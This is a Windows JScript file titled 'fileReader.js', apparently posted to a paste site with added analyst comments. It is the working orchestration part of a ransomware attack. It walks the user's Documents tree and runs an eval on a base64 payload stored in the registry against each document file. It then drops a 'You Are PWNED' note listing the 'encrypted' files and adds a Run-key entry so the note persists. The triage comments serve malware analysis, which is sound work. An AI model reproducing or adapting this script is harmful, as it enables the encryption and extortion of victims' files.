FlyFar

fileReader.js

Sep 23rd, 2023
  1. //Base64 Decoder
  // Minified base64 helper that defines base64.decode and base64.encode on a
  // global `base64` object. The visible code calls only base64.decode, once,
  // to unpack the payload text read from the registry (see getDocumentFolder).
  // decode() throws when the input length is not a multiple of 4 or when a
  // character is outside the standard alphabet, and it returns a string of
  // byte-valued characters. Analysts can decode the same registry value
  // offline with any standard base64 tool instead of running this script.
  2. var base64={};base64.PADCHAR='=';base64.ALPHA='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';base64.makeDOMException=function(){var e,tmp;try{return new DOMException(DOMException.INVALID_CHARACTER_ERR)}catch(tmp){var ex=new Error('DOM Exception 5');ex.code=ex.number=5;ex.name=ex.description='INVALID_CHARACTER_ERR';ex.toString=function(){return'Error: '+ex.name+': '+ex.message};return ex}};base64.getbyte64=function(s,i){var idx=base64.ALPHA.indexOf(s.charAt(i));if(idx===-1){throw base64.makeDOMException();}return idx};base64.decode=function(s){s=''+s;var getbyte64=base64.getbyte64;var pads,i,b10;var imax=s.length;if(imax===0){return s}if(imax%4!==0){throw base64.makeDOMException();}pads=0;if(s.charAt(imax-1)===base64.PADCHAR){pads=1;if(s.charAt(imax-2)===base64.PADCHAR){pads=2}imax-=4}var x=[];for(i=0;i<imax;i+=4){b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12)|(getbyte64(s,i+2)<<6)|getbyte64(s,i+3);x.push(String.fromCharCode(b10>>16,(b10>>8)&0xff,b10&0xff))}switch(pads){case 1:b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12)|(getbyte64(s,i+2)<<6);x.push(String.fromCharCode(b10>>16,(b10>>8)&0xff));break;case 2:b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12);x.push(String.fromCharCode(b10>>16));break}return x.join('')};base64.getbyte=function(s,i){var x=s.charCodeAt(i);if(x>255){throw base64.makeDOMException();}return x};base64.encode=function(s){if(arguments.length!==1){throw new SyntaxError('Not enough arguments');}var padchar=base64.PADCHAR;var alpha=base64.ALPHA;var getbyte=base64.getbyte;var i,b10;var x=[];s=''+s;var imax=s.length-s.length%3;if(s.length===0){return s}for(i=0;i<imax;i+=3){b10=(getbyte(s,i)<<16)|(getbyte(s,i+1)<<8)|getbyte(s,i+2);x.push(alpha.charAt(b10>>18));x.push(alpha.charAt((b10>>12)&0x3F));x.push(alpha.charAt((b10>>6)&0x3f));x.push(alpha.charAt(b10&0x3f))}switch(s.length-imax){case 1:b10=getbyte(s,i)<<16;x.push(alpha.charAt(b10>>18)+alpha.charAt((b10>>12)&0x3F)+padchar+padchar);break;case 
2:b10=(getbyte(s,i)<<16)|(getbyte(s,i+1)<<8);x.push(alpha.charAt(b10>>18)+alpha.charAt((b10>>12)&0x3F)+alpha.charAt((b10>>6)&0x3f)+padchar);break}return x.join('')};
  3. //
  // Module-level configuration and state. For triage, the strings below are
  // the host artefacts this script reads or writes.
  //
  // `encryptor` holds source text, not a function: it is filled in
  // getDocumentFolder with the base64-decoded registry value and later passed
  // to eval in getFiles.
  4. var encryptor;
  // Registry value read to locate the user's "Personal" shell folder (the
  // Documents directory); this is the root of the folder walk.
  5. var personalFolderRegistryEntry = 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Personal';
  // Registry value the payload text is read from. Nothing in this file writes
  // it, so it is presumably staged by another component — confirm during
  // analysis. A base64 blob in a value named `e` here is a hunting lead.
  6. var encryptorRegistryEntry = 'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\e';
  // Name of the variable through which the target path is handed to the payload.
  7. var fileNameToEncryptVar = 'fileNameToEncrypt';
  // Value under the per-user Run key. The visible code uses it as an
  // "already ran" marker (isAleardyPwned) and stores the note's path in it
  // (finish). Run values are launched at logon, so this presumably also
  // reopens the note on each logon — confirm in a sandbox.
  8. var processFlagReg = 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\PWNED';
  // ActiveXObject exists only in Windows scripting hosts (WSH, HTA, legacy
  // IE), so this is JScript rather than browser or Node.js JavaScript.
  9. var fso = new ActiveXObject('Scripting.FileSystemObject');
  // Allow-list of targeted document extensions, keyed by lower-case extension
  // (see isValidExt).
  10. var fileExtList = {
  11.     txt : 'txt',
  12.     doc : 'doc',
  13.     docx : 'docx',
  14.     pdf : 'pdf',
  15.     xls : 'xls',
  16.     xlsx : 'xlsx',
  17.     xlsm : 'xlsm'
  18. };
  19.  
  // Paths of every file handed to the payload; rendered into the note by finish().
  20. var pwnedFileList = [];
  21.  
  // Returns the lower-cased text after the last '.' in fileShortName, or
  // false when the name contains no '.'.
  // NOTE(review): the only caller passes File.ShortName, i.e. the 8.3 alias
  // where one exists. 8.3 extensions have at most three characters, so
  // four-letter types probably match through their three-letter prefix
  // (docx -> doc). Confirm the affected file types in a sandbox rather than
  // reading them off fileExtList.
  22. function getFileExt(fileShortName) {
  23.     if(fileShortName.indexOf('.') > -1) {
  24.         return fileShortName.split('.').pop().toLowerCase();
  25.     } else {
  26.         return false;
  27.     }
  28. };
  29.  
  // Target filter: returns a truthy value (the extension string stored in
  // fileExtList) when the file's extension is on the allow-list, otherwise
  // undefined or false. Callers use the result only as a boolean.
  30. function isValidExt(fileShortName) {
  31.     var ext = getFileExt(fileShortName);
  32.     return ext ? fileExtList[ext] : false;
  33. };
  34.  
  // Processes the files directly inside folderPath (recursion is done by
  // getFolders). Every file that passes isValidExt is recorded in
  // pwnedFileList and then handed to the registry-sourced payload.
  35. function getFiles(folderPath) {
  36.     var folder = fso.GetFolder(folderPath);
  37.     var files = folder.files;
  38.     if(files.count > 0) {
  39.     var fileList = new Enumerator(folder.files);
  40.     for (; !fileList.atEnd(); fileList.moveNext()) {
  41.             try {
  42.                 if(isValidExt(fileList.item().ShortName)) {
                          // The path is recorded before the payload runs, and the
                          // catch below discards every error. The list written to
                          // the note is therefore not proof that a file was
                          // changed; verify each file by content or hash.
  43.                     pwnedFileList.push(fileList.item().path);
                          // The file-modifying logic is not in this script.
                          // `encryptor` is text decoded from the registry; it is
                          // prefixed with a `var fileNameToEncrypt = '<path>';`
                          // declaration and executed with eval. Static review of
                          // this file alone cannot tell what happens to the
                          // target; recover the registry value to analyse it.
  44.                     var evalString = 'var '+fileNameToEncryptVar+' = \''+fileList.item().path.replace(/\\/g, '\\\\')+'\';' + encryptor;
  45.                     eval(evalString);
  46.                 }
  47.             } catch(err) {}
  48.         }
  49.     }
  50. };
  51.  
  // Depth-first walk of the tree rooted at `path`: recurses into every
  // subfolder first, then calls getFiles on `path` itself. Errors raised
  // while handling a subfolder are discarded, so folders that cannot be read
  // are skipped silently.
  // NOTE(review): the recursive call passes the Folder object from the
  // enumerator, not a string; presumably fso.GetFolder coerces it to its
  // path — confirm.
  52. function getFolders(path) {
  53.     var folder = fso.GetFolder(path);
  54.     var subFolders = folder.SubFolders;
  55.     if(subFolders.count > 0) {
  56.         var folderList = new Enumerator(subFolders);
  57.         for (; !folderList.atEnd(); folderList.moveNext()) {
  58.             try {
  59.                 getFolders(folderList.item());
  60.             } catch(err) {}
  61.         }
  62.     }
  63.     getFiles(path);
  64. };
  65.  
  // Runs after the walk. If at least one file was recorded, it writes an HTML
  // note listing the recorded paths to the user's Desktop and stores the
  // note's path in the Run-key value held in processFlagReg.
  // Host indicators visible here: a file named "You Are PWNED.html" on the
  // Desktop and a Run value named PWNED pointing at it.
  66. function finish() {
  67.     if(pwnedFileList.length > 0) {
  68.         var wsh = new ActiveXObject('WScript.Shell');
              // The Desktop location is resolved from the per-user Shell Folders key.
  69.         var path = wsh.RegRead('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Desktop') + '\\You Are PWNED.html';
  70.         var htmlBody = '<html><head><title>You have been PWNED !!!!!!!</title></head><body><h1>You Have been PWNED by ME !!!!</h1><h3>Following files are encrypted</h3><p>'+   pwnedFileList.join('<br/>') +'</p></body></html>';
              // The second argument `true` overwrites an existing note of the same name.
  71.         var a = fso.CreateTextFile(path, true);
  72.         a.WriteLine(htmlBody);
  73.         a.Close();
              // This write sets the marker that isAleardyPwned checks; it is only
              // reached when pwnedFileList is non-empty.
  74.         wsh.RegWrite(processFlagReg, path, "REG_SZ");
  75.     }
  76. };
  77.  
  // Run-once guard: returns true when the Run value in processFlagReg can be
  // read and is non-empty. If the read throws (the try/catch suggests RegRead
  // throws when the value is missing), it returns false.
  // Triage note: when this value exists and is non-empty, getDocumentFolder
  // does nothing, so the marker also shows that a previous run reached finish().
  78. function isAleardyPwned() {
  79.     try {
  80.         var wsh = new ActiveXObject('WScript.Shell');
  81.         var val = wsh.RegRead(processFlagReg);
  82.         return val != '';
  83.     } catch(err) {}
  84.     return false;
  85. };
  // Orchestrates the whole run. Unless the run-once marker is already set, it
  // resolves the user's Documents ("Personal") folder from the registry,
  // decodes the payload text from encryptorRegistryEntry into `encryptor`,
  // walks the folder tree and writes the note. The visible code only
  // enumerates the Personal folder tree; the payload's own behaviour is not
  // shown on this page.
  86. function getDocumentFolder() {
  87.     if(isAleardyPwned() == false) {
  88.         var wsh = new ActiveXObject('WScript.Shell');
  89.         var path = wsh.RegRead(personalFolderRegistryEntry);
              // There is no try/catch here: a missing or malformed payload value
              // makes RegRead or base64.decode throw and stops the script before
              // the walk starts.
  90.         encryptor = base64.decode(wsh.RegRead(encryptorRegistryEntry));
  91.         getFolders(path);
  92.         finish();
  93.     }
  94. };
  // Entry point: the script acts as soon as a scripting host loads it; there
  // is no export and no user interaction.
  95. getDocumentFolder();